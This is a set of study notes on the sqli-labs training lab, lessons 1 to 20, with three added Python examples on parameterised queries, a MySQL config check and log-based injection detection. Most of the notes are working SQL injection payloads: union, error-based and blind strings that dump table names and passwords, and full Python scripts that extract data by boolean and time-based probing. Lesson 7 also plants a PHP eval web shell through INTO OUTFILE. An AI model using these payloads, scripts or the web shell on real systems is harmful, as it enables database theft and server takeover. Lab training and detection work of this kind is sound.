    sqli-labs study notes (basics)

    less-1 Single quote

    GET-Error based-Single quotes-String

    Backend statement:

    SELECT * FROM users WHERE id='$id' LIMIT 0,1


    Probe: 1'

    use near ''1'' LIMIT 0,1' at line 1

    Normal: 1' and 1=1%23

    Error: 1' and 1=2%23

    Find the column count: 1' order by 3%23

    Dump the database name: -1' union select 1,database(),3%23

    Dump table names: -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

    Dump column names: -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

    Dump data: -1' union select 1,group_concat(password),3 from security.users%23

    less-2 No quotes

    GET-Error based-Intiger based

    Backend statement:

    SELECT * FROM users WHERE id=$id LIMIT 0,1


    Probe: 1'

    use near '' LIMIT 0,1' at line 1

    Normal: 1 and 1=1%23

    Error: 1 and 1=2%23

    Find the column count: 1 order by 3%23

    Dump the database name: -1 union select 1,database(),3%23

    Dump table names: -1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

    Dump column names: -1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

    Dump data: -1 union select 1,group_concat(password),3 from security.users%23
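The less-1 and less-2 sections show that the quote context of the backend statement decides what an input has to look like before the database parses it as SQL: a string context needs a closing quote, an integer context does not. The following Python script is an added example and is not part of the original notes or of sqli-labs. It rebuilds both query shapes over an in-memory SQLite table (the lab runs on MySQL; sqlite3 is used so the example runs offline, and `-- ` stands in for the page's `%23` because SQLite has no `#` comments) and puts the hardened form, type validation plus a bound parameter, beside them. The table rows, user names and function names are constructed for the example.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab's security.users table (sample rows are made up).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'constructed-pw-1');
        INSERT INTO users VALUES (2, 'bob',   'constructed-pw-2');
    """)
    return conn


def lookup_string_context(conn, user_id):
    # less-1 shape: the value is pasted into a quoted literal, so a single
    # quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT id, username FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_integer_context(conn, user_id):
    # less-2 shape: no quotes around the value, so no quote is needed to break out.
    sql = f"SELECT id, username FROM users WHERE id={user_id} LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_hardened(conn, user_id):
    # Hardened form: enforce the expected type, then bind the value as a
    # parameter so the database engine never sees it as SQL text.
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        return None
    sql = "SELECT id, username FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_value,)).fetchone()


def oracle_present(lookup, conn, true_probe, false_probe):
    # The boolean oracle that less-5 and less-8 rely on exists when an
    # always-true and an always-false probe are answered differently.
    return lookup(conn, true_probe) != lookup(conn, false_probe)


if __name__ == "__main__":
    db = make_db()
    print(lookup_string_context(db, "1' and 1=1-- "))   # row 1 comes back
    print(lookup_string_context(db, "1' and 1=2-- "))   # None: the page's "no output" case
    print(lookup_string_context(db, "-1' union select 1,'injected'-- "))
    print(lookup_integer_context(db, "1 and 1=2-- "))
    print(lookup_hardened(db, "1' and 1=1-- "))          # None: rejected before any SQL runs
    print(oracle_present(lookup_string_context, db, "1' and 1=1-- ", "1' and 1=2-- "))
    print(oracle_present(lookup_hardened, db, "1' and 1=1-- ", "1' and 1=2-- "))
```

The hardened lookup rejects anything that is not an integer before touching the database, and even a value that passes validation is bound as a parameter, so the true/false probes of the later blind sections produce identical answers and the oracle disappears.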

    less-3 Parentheses plus single quote

    GET-Error based-Single quotes with twist-string

    Backend statement:

    SELECT * FROM users WHERE id=('$id') LIMIT 0,1


    Probe: 1'

    use near ''1'') LIMIT 0,1' at line 1

    Normal: 1') and 1=1%23

    Error: 1') and 1=2%23

    Find the column count: 1') order by 3%23

    Dump the database name: -1') union select 1,database(),3%23

    Dump table names: -1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

    Dump column names: -1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

    Dump data: -1') union select 1,group_concat(password),3 from security.users%23

    less-4 Parentheses plus double quote

    GET-Error based-Double Quotes-String

    Backend statement:

    SELECT * FROM users WHERE id=($id) LIMIT 0,1


    Probe: 1"

    use near '"1"") LIMIT 0,1' at line 1

    Normal: 1") and 1=1%23

    Error: 1") and 1=2%23

    Find the column count: 1") order by 3%23

    Dump the database name: -1") union select 1,database(),3%23

    Dump table names: -1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

    Dump column names: -1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

    Dump data: -1") union select 1,group_concat(password),3 from security.users%23

    less-5 Single-quote boolean blind injection

    GET-Double Injection-Single Quotes-String

    Backend statement:

    SELECT * FROM users WHERE id='$id' LIMIT 0,1


    Probe: 1'

    use near ''1'' LIMIT 0,1' at line 1

    Normal: 1' and 1=1%23 -> You are in...........

    Error: 1' and 1=2%23 -> no output

    Write the exploit script:

    import requests


    url = "http://127.0.0.1/sqli-labs-master/Less-5/?id="
    result = ""
    for i in range(1, 50):                    # character position
        for j in range(95, 128):              # candidate characters: '_' and a-z
            a = chr(j)
            payload = "1' and (select substr(database(),{},1) = '{}')-- +".format(i, a)
            html = requests.get(url + payload)
            print(i, j, ":")
            print(url + payload)
            if "You" in html.text:            # "You are in..." means the guess was right
                result = result + chr(j)
                break
        print(result)
    print("flag: ", result)

    # 1' and (select substr(database(),{},1) = '{}')-- +   database name
    # 1' and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- +   table names
    # 1' and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- +   column names
    # 1' and substr((select password from security.users limit 0,1),{},1)='{}'-- +   values


    less-6 Double-quote boolean blind injection

    GET-Double Injection-Double Quotes-String

    Backend statement:

    SELECT * FROM users WHERE id="$id" LIMIT 0,1


    Error: 1"

    use near '"1"" LIMIT 0,1' at line 1

    Normal: 1" and 1=1%23 -> You are in...........

    Error: 1" and 1=2%23 -> no output

    Modify the exploit payloads:

    # 1" and (select substr(database(),{},1) = '{}')-- +   database name
    # 1" and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- +   table names
    # 1" and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- +   column names
    # 1" and substr((select password from security.users limit 0,1),{},1)='{}'-- +   values


    less-7 Writing a shell

    GET-Dump into outfile-String

    Change the permission setting; path: phpstudy\PHPTutorial\MySQL\my.ini

    secure_file_priv = (if the line is absent, simply add it)

    Backend statement:

    SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1


    Write the shell:

    1')) union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test.php" --+

    An error is reported, but checking the folder shows the file was written successfully.
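The less-7 step only works because secure_file_priv is set to an empty string, which lets INTO OUTFILE write anywhere the MySQL service account can. The following Python function is an added example and is not part of the original notes: it reads a my.ini / my.cnf text with configparser and classifies the setting, so a reviewer can tell the unrestricted state apart from a directory restriction or from NULL. The ini fragments are constructed for the example, and the Windows upload directory in one of them is a made-up placeholder.

```python
import configparser

# Constructed my.ini fragments for the example (not the lab's actual file).
WEAK_INI = """\
[mysqld]
port=3306
secure_file_priv=
"""

RESTRICTED_INI = """\
[mysqld]
port=3306
# placeholder directory, not a real deployment path
secure_file_priv="C:/example/mysql-uploads/"
"""

ABSENT_INI = """\
[mysqld]
port=3306
"""


def secure_file_priv_status(ini_text):
    """Classify secure_file_priv in a my.ini / my.cnf text.

    'unrestricted' - empty value: INTO OUTFILE may write wherever the
                     mysqld service account can (the state less-7 relies on)
    'disabled'     - NULL: file import and export are switched off
    'restricted'   - a directory: exports are confined to that directory
    'unset'        - key absent: the server default applies; confirm the
                     live value with SHOW VARIABLES LIKE 'secure_file_priv'
    """
    parser = configparser.ConfigParser(
        allow_no_value=True, interpolation=None, strict=False
    )
    parser.read_string(ini_text)
    if not parser.has_section("mysqld"):
        return "unset"
    # MySQL option files accept either spelling of the option name.
    for key in ("secure_file_priv", "secure-file-priv"):
        if parser.has_option("mysqld", key):
            raw = parser.get("mysqld", key) or ""
            break
    else:
        return "unset"
    value = raw.strip().strip('"').strip("'")
    if value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "restricted"


if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("restricted", RESTRICTED_INI), ("absent", ABSENT_INI)):
        print(label, "->", secure_file_priv_status(text))
```

The config file is only half of the picture: INTO OUTFILE also needs the FILE privilege on the account the web application connects with, so the application's database user should not hold it even when secure_file_priv is restricted.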

    less-8 Boolean blind injection without error messages

    GET-Blind-Boolian Based-Single Quotes

    Backend statement:

    SELECT * FROM users WHERE id='$id' LIMIT 0,1


    Probe: 1"

    Normal: 1' and 1=1%23 -> You are in...........

    Error: 1' and 1=2%23 -> no output

    The less-5 exploit can be used directly.

    less-9 Single-quote time-based blind injection

    GET-Blind-time based-Single Quotes

    Backend statement:

    SELECT * FROM users WHERE id='$id' LIMIT 0,1


    Probe: 1' and if(1=0,1, sleep(5)) --+

    Write the exploit script:

    # coding:utf-8
    import requests
    import datetime

    name = ''
    for j in range(1, 9):                                   # character position
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':    # candidate characters
            url = '''http://127.0.0.1/sqli-labs-master/Less-9/?id='''
            payload = '''1' and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec > 2:                                     # the 3 s sleep fired: guess was right
                name += i
                print(name)
                break
        print('database_name:', name)


    less-10 Double-quote time-based blind injection

    GET-Blind-Time based-double quotes

    Backend statement:

    SELECT * FROM users WHERE id="$id" LIMIT 0,1


    Probe: 1" and if(1=0,1, sleep(5)) --+

    Write the exploit script:

    # coding:utf-8
    import requests
    import datetime

    name = ''
    for j in range(1, 9):                                   # character position
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':    # candidate characters
            url = '''http://127.0.0.1/sqli-labs-master/Less-10/?id='''
            payload = '''1" and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec > 2:                                     # the 3 s sleep fired: guess was right
                name += i
                print(name)
                break
        print('database_name:', name)

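The less-5 to less-10 scripts all leave the same trace: dozens of near-identical requests that differ only in the probed position and the candidate character, answered by a different page or by a delay. That regularity is what a defender looks for in access logs. The following Python script is an added example and is not from the original post: it parses constructed common-log-format lines (the request targets mirror the less-1, less-5 and less-9 payloads above), flags the payload families seen on this page (union select, information_schema, sleep(), updatexml(), substr()) and marks a client as running a blind-enumeration loop when it repeats one probe template at least four times. The log lines, client addresses and the threshold are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Common-log-format line: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Request-level signatures, checked against the URL-decoded request target.
# Each corresponds to a payload family used on this page.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "char_probe": re.compile(r"\b(substr|substring|mid|left|ascii)\s*\(", re.I),
}


def flag_request(target):
    """Decode a request target and return (decoded, [matching signature names])."""
    decoded = unquote_plus(target)
    return decoded, [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def template_of(decoded):
    """Collapse what a blind-injection loop varies (position, candidate
    character) so every probe of one loop maps to the same template."""
    collapsed = re.sub(r"'[^']?'", "'?'", decoded)
    return re.sub(r"\d+", "N", collapsed)


def analyze(lines, blind_threshold=4):
    """Return flagged events and a per-client verdict.

    A client is marked as blind enumeration when it repeats one probe
    template (character or time probe) at least blind_threshold times.
    """
    events = []
    suspicious = Counter()
    templates = defaultdict(Counter)
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        decoded, flags = flag_request(match["target"])
        if not flags:
            continue
        ip = match["ip"]
        suspicious[ip] += 1
        events.append((ip, decoded, flags))
        if "char_probe" in flags or "time_delay" in flags:
            templates[ip][template_of(decoded)] += 1
    clients = {}
    for ip, count in suspicious.items():
        repeats = max(templates[ip].values(), default=0)
        clients[ip] = {
            "suspicious_requests": count,
            "blind_enumeration": repeats >= blind_threshold,
        }
    return {"events": events, "clients": clients}


def _line(ip, second, target):
    return f'{ip} - - [01/Jan/2021:10:00:{second:02d} +0000] "GET {target} HTTP/1.1" 200 812'


# Constructed log lines (addresses, timestamps and sizes are made up); the
# request targets mirror the less-1, less-5 and less-9 payloads on this page.
BASE = "/sqli-labs-master/"
SAMPLE_LOG = [
    _line("10.0.0.5", 0, BASE + "Less-1/?id=1"),
    _line("10.0.0.5", 1, BASE + "Less-1/?id=2"),
    _line("10.0.0.9", 3, BASE + "Less-1/?id=-1%27%20union%20select%201,database(),3%23"),
]
# less-5 style boolean probes: one template, only position/character change
for n, ch in enumerate("abcd"):
    SAMPLE_LOG.append(_line("10.0.0.7", 5 + n,
        BASE + f"Less-5/?id=1%27%20and%20(select%20substr(database(),1,1)%20=%20%27{ch}%27)--%20+"))
SAMPLE_LOG.append(_line("10.0.0.7", 9,
    BASE + "Less-5/?id=1%27%20and%20(select%20substr(database(),2,1)%20=%20%27a%27)--%20+"))
# less-9 style time probes, fewer than the threshold
for n, ch in enumerate("abc"):
    SAMPLE_LOG.append(_line("10.0.0.8", 20 + n,
        BASE + f"Less-9/?id=1%27%20and%20if(substr(database(),1,1)=%27{ch}%27,sleep(3),1)%23"))

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, verdict in sorted(report["clients"].items()):
        print(ip, verdict)
```

Decoding before matching matters because the scripts above send every payload percent-encoded; the template collapse is what separates one person's odd-looking request from an automated loop, and the threshold should be tuned to the site's normal traffic.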

    less-11 Single-quote POST injection

    POST-Error Based-Single quotes-String

    Backend statement:

    SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1


    Probe: admin' & 123 (username & password)

    use near '123' LIMIT 0,1' at line 1

    Find the column count: admin' order by 2#

    Dump the database name: -admin' union select 1,database()#

    Dump table names: -admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

    Dump column names: -admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

    Dump data: -admin' union select 1,group_concat(password) from security.users#

    (Because # comments out everything after it, the password can be anything.)

    less-12 Double-quote POST injection

    POST-Error Based-Double quotes-String-with twist

    Backend statement:

    SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1


    (The actual code is not written this way; the notation is used here for brevity and means the same thing.)

    Probe: admin" & 123 (username & password)

    use near '123") LIMIT 0,1' at line 1

    Find the column count: admin") order by 2#

    Dump the database name: -admin") union select 1,database()#

    Dump table names: -admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

    Dump column names: -admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

    Dump data: -admin") union select 1,group_concat(password) from security.users#

    (Because # comments out everything after it, the password can be anything.)

    less-13 Single-quote error-based injection

    POST-Double Injection-Single quotes-String-with twist

    Situation: only error messages are shown; nothing else is echoed.

    Backend statement:

    SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1


    (The actual code is not written this way; the notation is used here for brevity and means the same thing.)

    Probe: admin' & 123 (username & password)

    use near '123') LIMIT 0,1' at line 1

    Find the column count: admin') order by 2#

    Dump the database name: 1')||updatexml(1,concat(0x7e,(select database()),0x7e),1)#

    Dump table names: 1')||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

    Dump column names: 1')||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

    Dump data: 1')||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#

    1')||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#

    (Because # comments out everything after it, the password can be anything.)

    less-14 Double-quote error-based injection

    POST-Double Injection-Double quotes-String-with twist

    Situation: only error messages are shown; nothing else is echoed.

    Backend statement:

    SELECT username, password FROM users WHERE username="$uname" and password="$passwd" LIMIT 0,1


    (The actual code is not written this way; the notation is used here for brevity and means the same thing.)

    Probe: admin" & 123 (username & password)

    use near '123" LIMIT 0,1' at line 1

    Find the column count: admin" order by 2#

    Dump the database name: 1"||updatexml(1,concat(0x7e,(select database()),0x7e),1)#

    Dump table names: 1"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

    Dump column names: 1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

    Dump data: 1"||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#

    1"||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#

    (Because # comments out everything after it, the password can be anything.)

    less-15 POST time-based blind injection

    POST-Blind-BOOlian/time Based-Single quotes

    No output at all.

    Backend statement:

    SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1


    Write the exploit script:

    #coding=utf-8

    import requests
    import time

    name = ""
    url = "http://127.0.0.1/sqli-labs-master/Less-15/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'Host': 'localhost'
    }
    currentTime = time.time()

    for i in range(1, 20):                    # prefix length
        for j in range(32, 128):              # candidate characters
            payload = " and if(left(database(),%d)='%s',sleep(4),null)#" % (i, name + chr(j))
            data = {
                "uname": "admin'" + payload,
                "passwd": "123",
                "submit": "Submit"
            }
            starttime = time.time()
            requests.post(url, data=data, headers=headers)   # only the response delay is used
            if time.time() - starttime >= 3:                 # the 4 s sleep fired: guess was right
                name += chr(j)
                print(j)
                break
    finishTime = time.time()
    print("[+]一共使用了" + str(finishTime - currentTime) + "s")
    print("[+]数据库名字:" + name)

    less-16 POST time-based blind injection

    POST-Blind-BOOlian/time Based-Double quotes

    No other output at all.

    Backend statement:

    SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1


    Just replace the single quote with a double quote.

    less-17 UPDATE injection

    POST-Update Query-Error Based-String

    Situation: the username is sanitized and the query against it is fixed, so it cannot be bypassed.

    Backend statement:

    UPDATE users SET password = '$passwd' WHERE username='$row1'


    Probe: admin & 1 (username & password)

    use near 'admin'' at line 1

    Dump the database name: 1'||updatexml(1,concat(0x7e,(select database()),0x7e),1)#

    Dump table names: 1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

    Dump column names: 1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

    Dump data: 1'||updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)#

    1'||updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)#

    (MySQL does not allow updating a table's column based on a value selected from that same table, so the SELECT result is wrapped in a derived table and selected once more.)

    less-18 INSERT injection

    POST-Header Injection-Uagent field-Error based

    Backend statement:

    INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)


    Dump the database name: 1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

    Dump table names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

    Dump column names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

    Dump data: 1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

    1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

    less-19 INSERT injection

    POST-Header Injection-Referer field-Error based

    Backend statement:

    INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')


    Dump the database name: 1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

    Dump table names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

    Dump column names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

    Dump data: 1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

    1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

    less-20 Cookie injection

    POST-Cookie Injections-Uagent field-error based

    Backend statement:

    SELECT * FROM users WHERE username='$cookee' LIMIT 0,1


    Dump the database name: 1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

    Dump table names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

    Dump column names: 1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

    Dump data: 1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

    1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

    Summary

    When each technique applies:

    Injection type   | Applies when                                        | Typical source pattern
    -----------------|-----------------------------------------------------|--------------------------------------------------
    Union-based      | query results are echoed to the page                | echo 'Your Login name:'. $row['username'];
    Error-based      | database error messages are echoed                  | print_r(mysql_error());
    Boolean blind    | true and false conditions give different output     | if($row){echo a}else{echo b}
    Time-based blind | true and false conditions take different time       | if($row){echo a}else{echo a}
    Write shell      | no output at all                                    | a normal statement
    Original article: https://www.cnblogs.com/karsa/p/14203005.html